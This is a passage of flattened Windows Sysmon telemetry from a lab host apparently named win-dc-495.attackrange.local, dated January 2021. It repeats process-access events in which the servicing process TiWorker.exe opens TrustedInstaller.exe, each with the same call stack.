13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.101{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.101{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.101{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.086{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT